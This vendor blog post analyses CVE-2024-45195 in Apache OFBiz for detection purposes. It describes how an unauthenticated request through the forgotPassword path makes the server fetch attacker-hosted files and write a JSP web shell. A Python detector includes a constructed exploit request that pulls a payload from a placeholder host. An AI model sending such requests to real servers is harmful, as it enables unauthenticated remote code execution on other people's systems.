Apache OFBiz (Open For Business) is an open-source enterprise resource planning (ERP) framework developed by the Apache Software Foundation. It provides a suite of tools and applications that help organizations manage their business processes. On September 04, 2024, the Rapid7 research team disclosed a vulnerability in OFBiz, identified as CVE-2024-45195; it was later added to CISA’s Known Exploited Vulnerabilities (KEV) catalogue on February 04, 2025. This vulnerability affects Apache OFBiz versions prior to 18.12.16 and is classified as a Direct Request (‘Forced Browsing’) weakness (CWE-425).
In this blog we take a closer look at the traffic pattern of this attack, including how to reproduce the vulnerable setup and exploit it.
Vulnerable Setup and Exploitation
Forced browsing (also called a direct request attack) is a web security vulnerability in which an attacker reaches restricted web resources such as files, directories, or pages without proper authentication or authorization. This is typically done by modifying the URL or requesting hidden resources directly.
As per the information from MITRE and NIST, Apache OFBiz versions 18.12.15 and earlier are vulnerable to forced browsing, which can lead to unauthenticated remote code execution (RCE). To understand the vulnerability better, ATI security researchers deployed a vulnerable OFBiz server (version 18.12.15) locally, as shown below –
Figure 1: Vulnerable Apache OFBiz Server (v18.12.15) Running on Localhost
The attack proceeds in the following steps –
Figure 2: CVE-2024-45195 Attack Steps
- Attacker Prepares Malicious Files
First, the attacker creates two malicious files: a CSV file whose content is the JSP web shell that will end up on the server, and an XML data-file definition that tells OFBiz how to parse that CSV –
Next, these two files are hosted on an HTTP server controlled by the attacker, as shown below –
Figure 3: Malicious Files Hosted in Attacker Controlled HTTP Server
- Attacker Sends POST Request to OFBiz Server
Next, the attacker sends a malicious POST request that makes the server fetch both files and store the CSV content as index.jsp, as shown below:
Figure 4: Attacker Sending Malicious POST Request to Vulnerable OFBiz Server
- OFBiz Downloads Malicious Files
Upon receiving the request, the OFBiz server downloads the CSV and XML files from the attacker-controlled HTTP server and writes the CSV content to an index.jsp file inside a web-executable directory (the path given by the request).
Figure 5: Vulnerable OFBiz Server Downloads Malicious Files
- Attacker Executes Remote Code
Finally, the attacker requests the planted index.jsp with a command parameter, and the web shell runs that command on the server –
Figure 6: Attacker Executes OS Command (`ls`) Remotely in Vulnerable OFBiz Server
This demonstrates how reaching OFBiz’s data-file import feature without authentication (a forced browsing flaw, not a misconfiguration) leads to full system compromise via remote code execution (RCE).
Attack Traffic Analysis
From the captured traffic we can see the attacker sending a malicious HTTP POST request to the vulnerable endpoint “/webtools/control/forgotPassword/viewdatafile”. The first path segment after the controller, forgotPassword, is one OFBiz serves without a login, while the request is ultimately routed to the last segment, viewdatafile, which should require one; this is the forced browsing bypass that lets an unauthenticated client make the Apache OFBiz server fetch and save the malicious files.
Figure 7: Sample Malicious HTTP POST Request Sent by Attacker
The request body contains several interesting parameters –
- DATAFILE_LOCATION: Specifies the external URL (attacker-controlled server) of the CSV file that the victim server will download.
- DATAFILE_IS_URL: Informs the server that DATAFILE_LOCATION is a URL and should be fetched remotely.
- DATAFILE_SAVE: Defines the path on the victim server where the downloaded data file will be written (here an index.jsp inside a web-served directory).
- DEFINITION_LOCATION: Specifies the external URL (attacker-controlled server) of the XML definition file that describes how the downloaded CSV data should be parsed.
- DEFINITION_IS_URL: Informs the server that DEFINITION_LOCATION is a URL and should be fetched remotely.
- DEFINITION_NAME: Names the data-file definition inside the XML that the server should apply to the CSV.
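To make the traffic pattern above concrete, here is an added example, written for this post and not code from the original article, from Keysight’s Strike, or from Apache OFBiz. It parses a raw HTTP request and flags the three indicators just described: the forgotPassword segment used to reach viewdatafile, DATAFILE_*/DEFINITION_* parameters pointing at a remote URL, and a DATAFILE_SAVE path under a web-served directory. It is also run against an ordinary forgotPassword request and a legitimate local import to show that neither triggers. The sample requests, host names, the 192.0.2.10 address and the file paths are constructed assumptions for illustration, not captured traffic.

```python
"""Flag HTTP requests that match the CVE-2024-45195 traffic pattern.

Added example for this post, not code from the original article, from
Keysight's Strike, or from Apache OFBiz. The sample requests below are
constructed: host names, the 192.0.2.10 documentation address and the file
paths are assumptions for illustration, not captured traffic.
"""
from urllib.parse import parse_qs, urlsplit

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
WEB_EXEC_SUFFIXES = (".jsp", ".jspx", ".jspf")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, parameters).

    Query-string and form-body parameters are merged into one dict so the
    checks below do not care where the attacker placed them.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    params.update({k: v[0] for k, v in parse_qs(body).items()})
    return method, parts.path, params


def check_cve_2024_45195(raw: str) -> dict:
    """Return the indicators found in one request and an overall verdict."""
    method, path, params = parse_request(raw)
    segments = [s for s in path.split("/") if s]
    indicators = []

    # Indicator 1: forced browsing through the OFBiz controller. The first
    # segment after "control" is forgotPassword, which is served without a
    # login, but the request is routed to the last segment, viewdatafile.
    if "control" in segments:
        after = segments[segments.index("control") + 1:]
        if len(after) >= 2 and after[0] == "forgotPassword" and after[-1] == "viewdatafile":
            indicators.append("forgotPassword path used to reach viewdatafile")

    # Indicator 2: the server is told to fetch the data file and/or its
    # definition from a remote URL instead of reading a local path.
    for prefix in ("DATAFILE", "DEFINITION"):
        location = params.get(f"{prefix}_LOCATION", "")
        if (params.get(f"{prefix}_IS_URL", "").upper() == "Y"
                and location.lower().startswith(REMOTE_SCHEMES)):
            indicators.append(f"{prefix}_LOCATION is a remote URL: {location}")

    # Indicator 3: the fetched content is written where the servlet container
    # will execute it (a JSP, or anything under a webapp directory).
    save = params.get("DATAFILE_SAVE", "")
    if save.lower().endswith(WEB_EXEC_SUFFIXES) or "/webapp/" in save:
        indicators.append(f"DATAFILE_SAVE targets a web-executable path: {save}")

    if len(indicators) >= 3:
        verdict = "exploit"
    elif indicators:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"method": method, "path": path, "indicators": indicators, "verdict": verdict}


# Constructed sample: the exploit request as the post describes it.
ATTACK_REQUEST = (
    "POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1\r\n"
    "Host: ofbiz.example.test:8443\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "DATAFILE_LOCATION=http%3A%2F%2F192.0.2.10%3A8000%2Fpayload.csv"
    "&DATAFILE_IS_URL=Y"
    "&DATAFILE_SAVE=%2Fopt%2Fofbiz%2Fframework%2Fimages%2Fwebapp%2Fimages%2Findex.jsp"
    "&DEFINITION_LOCATION=http%3A%2F%2F192.0.2.10%3A8000%2Fdefinition.xml"
    "&DEFINITION_IS_URL=Y"
    "&DEFINITION_NAME=DEFINITION_NAME"
)

# Constructed sample: an ordinary request to the same login-free endpoint,
# which must not trigger.
BENIGN_FORGOT_PASSWORD = (
    "POST /webtools/control/forgotPassword HTTP/1.1\r\n"
    "Host: ofbiz.example.test:8443\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "USERNAME=admin"
)

# Constructed sample: an administrator importing a local data file through
# the normal, login-protected viewdatafile request.
LEGIT_LOCAL_IMPORT = (
    "POST /webtools/control/viewdatafile HTTP/1.1\r\n"
    "Host: ofbiz.example.test:8443\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "DATAFILE_LOCATION=%2Fopt%2Fofbiz%2Fruntime%2Fdata%2Forders.dat"
    "&DEFINITION_LOCATION=%2Fopt%2Fofbiz%2Fruntime%2Fdata%2Forders.xml"
    "&DEFINITION_NAME=Orders"
)

if __name__ == "__main__":
    for name, raw in (("attack", ATTACK_REQUEST),
                      ("forgot-password", BENIGN_FORGOT_PASSWORD),
                      ("local-import", LEGIT_LOCAL_IMPORT)):
        result = check_cve_2024_45195(raw)
        print(f"{name}: {result['verdict']}")
        for indicator in result["indicators"]:
            print(f"  - {indicator}")
```

The verdict deliberately needs all three indicator classes before it says “exploit”: an authenticated administrator can legitimately post remote URLs to viewdatafile, and a stray forgotPassword path on its own proves nothing, so either alone is only reported as “suspicious”.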
1-Arm CVE-2024-45195 Strike in BreakingPoint
At Keysight Technologies, the security researchers of our Application and Threat Intelligence (ATI) team have examined the attack traffic pattern of the Direct Request (‘Forced Browsing’) vulnerability in Apache OFBiz (CVE-2024-45195) and added a new 1-arm (verified) Strike in the ATI-2024-03 StrikePack, released on February 26, 2025, as shown below –
Figure 8: New Apache OFBiz Forced Browsing Vulnerability Strike in BPS
This Strike exploits a forced browsing vulnerability in Apache OFBiz. The vulnerability is due to improper access control in the web application. A remote attacker could exploit it by accessing restricted URLs directly. Successful exploitation could result in unauthorized access to sensitive information or, as shown above, unauthenticated remote code execution.
Leverage Subscription Service to Stay Ahead of Attacks
Keysight’s Application and Threat Intelligence subscription provides daily malware updates and bi-weekly updates of the latest application protocols and vulnerabilities for use with Keysight test platforms. The ATI Research Centre continuously monitors threats as they appear in the wild. BreakingPoint customers also have access to attack campaigns for different advanced persistent threats, allowing them to test their currently deployed security controls’ ability to detect or block such attacks.